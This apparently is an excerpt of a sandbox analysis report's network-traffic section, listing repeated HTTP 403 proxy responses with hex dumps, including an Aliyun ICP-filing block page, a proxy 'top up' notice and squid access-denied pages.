20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:30 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:30 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:30 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:30 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:30 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:30 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
